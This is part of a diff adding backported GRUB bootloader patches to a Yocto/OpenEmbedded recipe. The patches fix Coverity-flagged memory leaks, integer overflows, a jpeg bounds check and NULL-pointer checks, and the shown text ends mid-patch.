+++ b/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch
@@ -0,0 +1,56 @@
+From b136fa14d26d1833ffcb852f86e65da5960cfb99 Mon Sep 17 00:00:00 2001
+From: Chris Coulson <chris.coulson@canonical.com>
+Date: Tue, 1 Dec 2020 23:41:24 +0000
+Subject: [PATCH] commands/hashsum: Fix a memory leak
+
+check_list() uses grub_file_getline(), which allocates a buffer.
+If the hash list file contains invalid lines, the function leaks
+this buffer when it returns an error.
+
+Fixes: CID 176635
+
+Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8b6f528e52e18b7a69f90b8dc3671d7b1147d9f3]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/hashsum.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/commands/hashsum.c b/grub-core/commands/hashsum.c
+index 456ba90..b8a22b0 100644
+--- a/grub-core/commands/hashsum.c
++++ b/grub-core/commands/hashsum.c
+@@ -128,11 +128,17 @@ check_list (const gcry_md_spec_t *hash, const char *hashfilename,
+ high = hextoval (*p++);
+ low = hextoval (*p++);
+ if (high < 0 || low < 0)
+- return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ {
++ grub_free (buf);
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ }
+ expected[i] = (high << 4) | low;
+ }
+ if ((p[0] != ' ' && p[0] != '\t') || (p[1] != ' ' && p[1] != '\t'))
+- return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ {
++ grub_free (buf);
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ }
+ p += 2;
+ if (prefix)
+ {
+@@ -140,7 +146,10 @@ check_list (const gcry_md_spec_t *hash, const char *hashfilename,
+
+ filename = grub_xasprintf ("%s/%s", prefix, p);
+ if (!filename)
+- return grub_errno;
++ {
++ grub_free (buf);
++ return grub_errno;
++ }
+ file = grub_file_open (filename, GRUB_FILE_TYPE_TO_HASH
+ | (!uncompress ? GRUB_FILE_TYPE_NO_DECOMPRESS
+ : GRUB_FILE_TYPE_NONE));
diff --git a/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch b/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch
new file mode 100644
index 0000000000..7e4e951245
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch
@@ -0,0 +1,94 @@
+From 2a1e5659763790201a342f8a897c8c9d8d91b1cc Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 21:14:31 +0000
+Subject: [PATCH] video/efi_gop: Remove unnecessary return value of
+ grub_video_gop_fill_mode_info()
+
+The return value of grub_video_gop_fill_mode_info() is never able to be
+anything other than GRUB_ERR_NONE. So, rather than continue to return
+a value and checking it each time, it is more correct to redefine the
+function to not return anything and remove checks of its return value
+altogether.
+
+Fixes: CID 96701
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=fc5951d3b1616055ef81a019a5affc09d13344d0]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/efi_gop.c | 25 ++++++-------------------
+ 1 file changed, 6 insertions(+), 19 deletions(-)
+
+diff --git a/grub-core/video/efi_gop.c b/grub-core/video/efi_gop.c
+index 7f9d1c2..db2ee98 100644
+--- a/grub-core/video/efi_gop.c
++++ b/grub-core/video/efi_gop.c
+@@ -227,7 +227,7 @@ grub_video_gop_fill_real_mode_info (unsigned mode,
+ return GRUB_ERR_NONE;
+ }
+
+-static grub_err_t
++static void
+ grub_video_gop_fill_mode_info (unsigned mode,
+ struct grub_efi_gop_mode_info *in,
+ struct grub_video_mode_info *out)
+@@ -252,8 +252,6 @@ grub_video_gop_fill_mode_info (unsigned mode,
+ out->blit_format = GRUB_VIDEO_BLIT_FORMAT_BGRA_8888;
+ out->mode_type |= (GRUB_VIDEO_MODE_TYPE_DOUBLE_BUFFERED
+ | GRUB_VIDEO_MODE_TYPE_UPDATING_SWAP);
+-
+- return GRUB_ERR_NONE;
+ }
+
+ static int
+@@ -266,7 +264,6 @@ grub_video_gop_iterate (int (*hook) (const struct grub_video_mode_info *info, vo
+ grub_efi_uintn_t size;
+ grub_efi_status_t status;
+ struct grub_efi_gop_mode_info *info = NULL;
+- grub_err_t err;
+ struct grub_video_mode_info mode_info;
+
+ status = efi_call_4 (gop->query_mode, gop, mode, &size, &info);
+@@ -277,12 +274,7 @@ grub_video_gop_iterate (int (*hook) (const struct grub_video_mode_info *info, vo
+ continue;
+ }
+
+- err = grub_video_gop_fill_mode_info (mode, info, &mode_info);
+- if (err)
+- {
+- grub_errno = GRUB_ERR_NONE;
+- continue;
+- }
++ grub_video_gop_fill_mode_info (mode, info, &mode_info);
+ if (hook (&mode_info, hook_arg))
+ return 1;
+ }
+@@ -466,13 +458,8 @@ grub_video_gop_setup (unsigned int width, unsigned int height,
+
+ info = gop->mode->info;
+
+- err = grub_video_gop_fill_mode_info (gop->mode->mode, info,
+- &framebuffer.mode_info);
+- if (err)
+- {
+- grub_dprintf ("video", "GOP: couldn't fill mode info\n");
+- return err;
+- }
++ grub_video_gop_fill_mode_info (gop->mode->mode, info,
++ &framebuffer.mode_info);
+
+ framebuffer.ptr = (void *) (grub_addr_t) gop->mode->fb_base;
+ framebuffer.offscreen
+@@ -486,8 +473,8 @@ grub_video_gop_setup (unsigned int width, unsigned int height,
+ {
+ grub_dprintf ("video", "GOP: couldn't allocate shadow\n");
+ grub_errno = 0;
+- err = grub_video_gop_fill_mode_info (gop->mode->mode, info,
+- &framebuffer.mode_info);
++ grub_video_gop_fill_mode_info (gop->mode->mode, info,
++ &framebuffer.mode_info);
+ buffer = framebuffer.ptr;
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch b/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch
new file mode 100644
index 0000000000..8165ea3f71
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch
@@ -0,0 +1,78 @@
+From 99ecf5a44b99d529a6405fe276bedcefa3657a0a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 4 Nov 2020 15:10:51 +0000
+Subject: [PATCH] video/fb/fbfill: Fix potential integer overflow
+
+The multiplication of 2 unsigned 32-bit integers may overflow before
+promotion to unsigned 64-bit. We should ensure that the multiplication
+is done with overflow detection. Additionally, use grub_sub() for
+subtraction.
+
+Fixes: CID 73640, CID 73697, CID 73702, CID 73823
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7ce3259f67ac2cd93acb0ec0080c24b3b69e66c6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/fbfill.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/video/fb/fbfill.c b/grub-core/video/fb/fbfill.c
+index 11816d0..a37acd1 100644
+--- a/grub-core/video/fb/fbfill.c
++++ b/grub-core/video/fb/fbfill.c
+@@ -31,6 +31,7 @@
+ #include <grub/fbfill.h>
+ #include <grub/fbutil.h>
+ #include <grub/types.h>
++#include <grub/safemath.h>
+ #include <grub/video.h>
+
+ /* Generic filler that works for every supported mode. */
+@@ -61,7 +62,9 @@ grub_video_fbfill_direct32 (struct grub_video_fbblit_info *dst,
+
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -98,7 +101,9 @@ grub_video_fbfill_direct24 (struct grub_video_fbblit_info *dst,
+ #endif
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -131,7 +136,9 @@ grub_video_fbfill_direct16 (struct grub_video_fbblit_info *dst,
+
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = (dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width);
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -161,7 +168,9 @@ grub_video_fbfill_direct8 (struct grub_video_fbblit_info *dst,
+
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
diff --git a/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch b/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch
new file mode 100644
index 0000000000..544e7f31ae
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch
@@ -0,0 +1,104 @@
+From 69b91f7466a5ad5fb85039a5b4118efb77ad6347 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 4 Nov 2020 14:43:44 +0000
+Subject: [PATCH] video/fb/video_fb: Fix multiple integer overflows
+
+The calculation of the unsigned 64-bit value is being generated by
+multiplying 2, signed or unsigned, 32-bit integers which may overflow
+before promotion to unsigned 64-bit. Fix all of them.
+
+Fixes: CID 73703, CID 73767, CID 73833
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=08e098b1dbf01e96376f594b337491bc4cfa48dd]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/video_fb.c | 52 ++++++++++++++++++++++++-----------
+ 1 file changed, 36 insertions(+), 16 deletions(-)
+
+diff --git a/grub-core/video/fb/video_fb.c b/grub-core/video/fb/video_fb.c
+index 1a602c8..1c9a138 100644
+--- a/grub-core/video/fb/video_fb.c
++++ b/grub-core/video/fb/video_fb.c
+@@ -25,6 +25,7 @@
+ #include <grub/fbutil.h>
+ #include <grub/bitmap.h>
+ #include <grub/dl.h>
++#include <grub/safemath.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -1417,15 +1418,23 @@ doublebuf_blit_update_screen (void)
+ {
+ if (framebuffer.current_dirty.first_line
+ <= framebuffer.current_dirty.last_line)
+- grub_memcpy ((char *) framebuffer.pages[0]
+- + framebuffer.current_dirty.first_line
+- * framebuffer.back_target->mode_info.pitch,
+- (char *) framebuffer.back_target->data
+- + framebuffer.current_dirty.first_line
+- * framebuffer.back_target->mode_info.pitch,
+- framebuffer.back_target->mode_info.pitch
+- * (framebuffer.current_dirty.last_line
+- - framebuffer.current_dirty.first_line));
++ {
++ grub_size_t copy_size;
++
++ if (grub_sub (framebuffer.current_dirty.last_line,
++ framebuffer.current_dirty.first_line, &copy_size) ||
++ grub_mul (framebuffer.back_target->mode_info.pitch, copy_size, &copy_size))
++ {
++ /* Shouldn't happen, but if it does we've a bug. */
++ return GRUB_ERR_BUG;
++ }
++
++ grub_memcpy ((char *) framebuffer.pages[0] + framebuffer.current_dirty.first_line *
++ framebuffer.back_target->mode_info.pitch,
++ (char *) framebuffer.back_target->data + framebuffer.current_dirty.first_line *
++ framebuffer.back_target->mode_info.pitch,
++ copy_size);
++ }
+ framebuffer.current_dirty.first_line
+ = framebuffer.back_target->mode_info.height;
+ framebuffer.current_dirty.last_line = 0;
+@@ -1439,7 +1448,7 @@ grub_video_fb_doublebuf_blit_init (struct grub_video_fbrender_target **back,
+ volatile void *framebuf)
+ {
+ grub_err_t err;
+- grub_size_t page_size = mode_info.pitch * mode_info.height;
++ grub_size_t page_size = (grub_size_t) mode_info.pitch * mode_info.height;
+
+ framebuffer.offscreen_buffer = grub_zalloc (page_size);
+ if (! framebuffer.offscreen_buffer)
+@@ -1482,12 +1491,23 @@ doublebuf_pageflipping_update_screen (void)
+ last_line = framebuffer.previous_dirty.last_line;
+
+ if (first_line <= last_line)
+- grub_memcpy ((char *) framebuffer.pages[framebuffer.render_page]
+- + first_line * framebuffer.back_target->mode_info.pitch,
+- (char *) framebuffer.back_target->data
+- + first_line * framebuffer.back_target->mode_info.pitch,
+- framebuffer.back_target->mode_info.pitch
+- * (last_line - first_line));
++ {
++ grub_size_t copy_size;
++
++ if (grub_sub (last_line, first_line, &copy_size) ||
++ grub_mul (framebuffer.back_target->mode_info.pitch, copy_size, &copy_size))
++ {
++ /* Shouldn't happen, but if it does we've a bug. */
++ return GRUB_ERR_BUG;
++ }
++
++ grub_memcpy ((char *) framebuffer.pages[framebuffer.render_page] + first_line *
++ framebuffer.back_target->mode_info.pitch,
++ (char *) framebuffer.back_target->data + first_line *
++ framebuffer.back_target->mode_info.pitch,
++ copy_size);
++ }
++
+ framebuffer.previous_dirty = framebuffer.current_dirty;
+ framebuffer.current_dirty.first_line
+ = framebuffer.back_target->mode_info.height;
diff --git a/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch b/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch
new file mode 100644
index 0000000000..c82b2c7df0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch
@@ -0,0 +1,39 @@
+From aac5574ff340a665ccc78d4c3d61596ac67acbbe Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 14:51:30 +0000
+Subject: [PATCH] video/fb/video_fb: Fix possible integer overflow
+
+It is minimal possibility that the values being used here will overflow.
+So, change the code to use the safemath function grub_mul() to ensure
+that doesn't happen.
+
+Fixes: CID 73761
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=08413f2f4edec0e2d9bf15f836f6ee5ca2e379cb]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/video_fb.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/video/fb/video_fb.c b/grub-core/video/fb/video_fb.c
+index 1c9a138..ae6b89f 100644
+--- a/grub-core/video/fb/video_fb.c
++++ b/grub-core/video/fb/video_fb.c
+@@ -1537,7 +1537,13 @@ doublebuf_pageflipping_init (struct grub_video_mode_info *mode_info,
+ volatile void *page1_ptr)
+ {
+ grub_err_t err;
+- grub_size_t page_size = mode_info->pitch * mode_info->height;
++ grub_size_t page_size = 0;
++
++ if (grub_mul (mode_info->pitch, mode_info->height, &page_size))
++ {
++ /* Shouldn't happen, but if it does we've a bug. */
++ return GRUB_ERR_BUG;
++ }
+
+ framebuffer.offscreen_buffer = grub_malloc (page_size);
+ if (! framebuffer.offscreen_buffer)
diff --git a/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch b/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch
new file mode 100644
index 0000000000..3fca2aecb5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch
@@ -0,0 +1,38 @@
+From 88361a7fd4e481a76e1159a63c9014fa997ef29c Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 15:39:00 +0000
+Subject: [PATCH] video/readers/jpeg: Test for an invalid next marker reference
+ from a jpeg file
+
+While it may never happen, and potentially could be caught at the end of
+the function, it is worth checking up front for a bad reference to the
+next marker just in case of a maliciously crafted file being provided.
+
+Fixes: CID 73694
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5f5eb7ca8e971227e95745abe541df3e1509360e]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/readers/jpeg.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/grub-core/video/readers/jpeg.c b/grub-core/video/readers/jpeg.c
+index 31359a4..0b6ce3c 100644
+--- a/grub-core/video/readers/jpeg.c
++++ b/grub-core/video/readers/jpeg.c
+@@ -253,6 +253,12 @@ grub_jpeg_decode_quan_table (struct grub_jpeg_data *data)
+ next_marker = data->file->offset;
+ next_marker += grub_jpeg_get_word (data);
+
++ if (next_marker > data->file->size)
++ {
++ /* Should never be set beyond the size of the file. */
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "jpeg: invalid next reference");
++ }
++
+ while (data->file->offset + sizeof (data->quan_table[id]) + 1
+ <= next_marker)
+ {
diff --git a/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch b/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch
new file mode 100644
index 0000000000..61e5e5797d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch
@@ -0,0 +1,34 @@
+From 9433cb3a37c03f22c2fa769121f1f509fd031ae9 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Mon, 7 Dec 2020 14:44:47 +0000
+Subject: [PATCH] gfxmenu/gui_list: Remove code that coverity is flagging as
+ dead
+
+The test of value for NULL before calling grub_strdup() is not required,
+since the if condition prior to this has already tested for value being
+NULL and cannot reach this code if it is.
+
+Fixes: CID 73659
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=4a1aa5917595650efbd46b581368c470ebee42ab]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/gfxmenu/gui_list.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/gfxmenu/gui_list.c b/grub-core/gfxmenu/gui_list.c
+index 01477cd..df334a6 100644
+--- a/grub-core/gfxmenu/gui_list.c
++++ b/grub-core/gfxmenu/gui_list.c
+@@ -771,7 +771,7 @@ list_set_property (void *vself, const char *name, const char *value)
+ {
+ self->need_to_recreate_boxes = 1;
+ grub_free (self->selected_item_box_pattern);
+- self->selected_item_box_pattern = value ? grub_strdup (value) : 0;
++ self->selected_item_box_pattern = grub_strdup (value);
+ self->selected_item_box_pattern_inherit = 0;
+ }
+ }
diff --git a/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch b/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch
new file mode 100644
index 0000000000..34643e10ab
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch
@@ -0,0 +1,47 @@
+From 7899384c8fdf9ed96566978c49b0c6e40e70703d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 21:47:13 +0000
+Subject: [PATCH] loader/bsd: Check for NULL arg up-front
+
+The code in the next block suggests that it is possible for .set to be
+true but .arg may still be NULL.
+
+This code assumes that it is never NULL, yet later is testing if it is
+NULL - that is inconsistent.
+
+So we should check first if .arg is not NULL, and remove this check that
+is being flagged by Coverity since it is no longer required.
+
+Fixes: CID 292471
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5d5391b0a05abe76e04c1eb68dcc6cbef5326c4a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/i386/bsd.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/loader/i386/bsd.c b/grub-core/loader/i386/bsd.c
+index b92cbe9..8432283 100644
+--- a/grub-core/loader/i386/bsd.c
++++ b/grub-core/loader/i386/bsd.c
+@@ -1605,7 +1605,7 @@ grub_cmd_openbsd (grub_extcmd_context_t ctxt, int argc, char *argv[])
+ kernel_type = KERNEL_TYPE_OPENBSD;
+ bootflags = grub_bsd_parse_flags (ctxt->state, openbsd_flags);
+
+- if (ctxt->state[OPENBSD_ROOT_ARG].set)
++ if (ctxt->state[OPENBSD_ROOT_ARG].set && ctxt->state[OPENBSD_ROOT_ARG].arg != NULL)
+ {
+ const char *arg = ctxt->state[OPENBSD_ROOT_ARG].arg;
+ unsigned type, unit, part;
+@@ -1622,7 +1622,7 @@ grub_cmd_openbsd (grub_extcmd_context_t ctxt, int argc, char *argv[])
+ "unknown disk type name");
+
+ unit = grub_strtoul (arg, (char **) &arg, 10);
+- if (! (arg && *arg >= 'a' && *arg <= 'z'))
++ if (! (*arg >= 'a' && *arg <= 'z'))
+ return grub_error (GRUB_ERR_BAD_ARGUMENT,
+ "only device specifications of form "
+ "<type><number><lowercase letter> are supported");
diff --git a/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch b/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch
new file mode 100644
index 0000000000..41f09a22fc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch
@@ -0,0 +1,38 @@
+From 0a4aa7c16f65cdfaa1013f0796afa929f8d6dc1a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 12:53:10 +0000
+Subject: [PATCH] loader/xnu: Fix memory leak
+
+The code here is finished with the memory stored in name, but it only
+frees it if there curvalue is valid, while it could actually free it
+regardless.
+
+The fix is a simple relocation of the grub_free() to before the test
+of curvalue.
+
+Fixes: CID 96646
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=bcb59ece3263d118510c4440c4da0950f224bb7f]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 07232d2..b3029a8 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -1388,9 +1388,9 @@ grub_xnu_fill_devicetree (void)
+ name[len] = 0;
+
+ curvalue = grub_xnu_create_value (curkey, name);
++ grub_free (name);
+ if (!curvalue)
+ return grub_errno;
+- grub_free (name);
+
+ data = grub_malloc (grub_strlen (var->value) + 1);
+ if (!data)
diff --git a/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch b/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch
new file mode 100644
index 0000000000..f9ad0fc34c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch
@@ -0,0 +1,77 @@
+From 81117a77a9e945ee5e7c1f12bd5667e2a16cbe32 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Mon, 30 Nov 2020 12:18:24 -0300
+Subject: [PATCH] loader/xnu: Free driverkey data when an error is detected in
+ grub_xnu_writetree_toheap()
+
+... to avoid memory leaks.
+
+Fixes: CID 96640
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=4b4027b6b1c877d7ab467896b04c7bd1aadcfa15]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 24 ++++++++++++++++++++----
+ 1 file changed, 20 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index b3029a8..39ceff8 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -224,26 +224,33 @@ grub_xnu_writetree_toheap (grub_addr_t *target, grub_size_t *size)
+ if (! memorymap)
+ return grub_errno;
+
+- driverkey = (struct grub_xnu_devtree_key *) grub_malloc (sizeof (*driverkey));
++ driverkey = (struct grub_xnu_devtree_key *) grub_zalloc (sizeof (*driverkey));
+ if (! driverkey)
+ return grub_errno;
+ driverkey->name = grub_strdup ("DeviceTree");
+ if (! driverkey->name)
+- return grub_errno;
++ {
++ err = grub_errno;
++ goto fail;
++ }
++
+ driverkey->datasize = sizeof (*extdesc);
+ driverkey->next = memorymap->first_child;
+ memorymap->first_child = driverkey;
+ driverkey->data = extdesc
+ = (struct grub_xnu_extdesc *) grub_malloc (sizeof (*extdesc));
+ if (! driverkey->data)
+- return grub_errno;
++ {
++ err = grub_errno;
++ goto fail;
++ }
+
+ /* Allocate the space based on the size with dummy value. */
+ *size = grub_xnu_writetree_get_size (grub_xnu_devtree_root, "/");
+ err = grub_xnu_heap_malloc (ALIGN_UP (*size + 1, GRUB_XNU_PAGESIZE),
+ &src, target);
+ if (err)
+- return err;
++ goto fail;
+
+ /* Put real data in the dummy. */
+ extdesc->addr = *target;
+@@ -252,6 +259,15 @@ grub_xnu_writetree_toheap (grub_addr_t *target, grub_size_t *size)
+ /* Write the tree to heap. */
+ grub_xnu_writetree_toheap_real (src, grub_xnu_devtree_root, "/");
+ return GRUB_ERR_NONE;
++
++ fail:
++ memorymap->first_child = NULL;
++
++ grub_free (driverkey->data);
++ grub_free (driverkey->name);
++ grub_free (driverkey);
++
++ return err;
+ }
+
+ /* Find a key or value in parent key. */
diff --git a/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch b/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch
new file mode 100644
index 0000000000..8081f7763a
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch
@@ -0,0 +1,42 @@
+From 778a3fffd19229e5650a1abfb06c974949991cd4 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 30 Nov 2020 10:36:00 -0300
+Subject: [PATCH] loader/xnu: Check if pointer is NULL before using it
+
+Fixes: CID 73654
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7c8a2b5d1421a0f2a33d33531f7561f3da93b844]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 39ceff8..adc048c 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -667,6 +667,9 @@ grub_xnu_load_driver (char *infoplistname, grub_file_t binaryfile,
+ char *name, *nameend;
+ int namelen;
+
++ if (infoplistname == NULL)
++ return grub_error (GRUB_ERR_BAD_FILENAME, N_("missing p-list filename"));
++
+ name = get_name_ptr (infoplistname);
+ nameend = grub_strchr (name, '/');
+
+@@ -698,10 +701,7 @@ grub_xnu_load_driver (char *infoplistname, grub_file_t binaryfile,
+ else
+ macho = 0;
+
+- if (infoplistname)
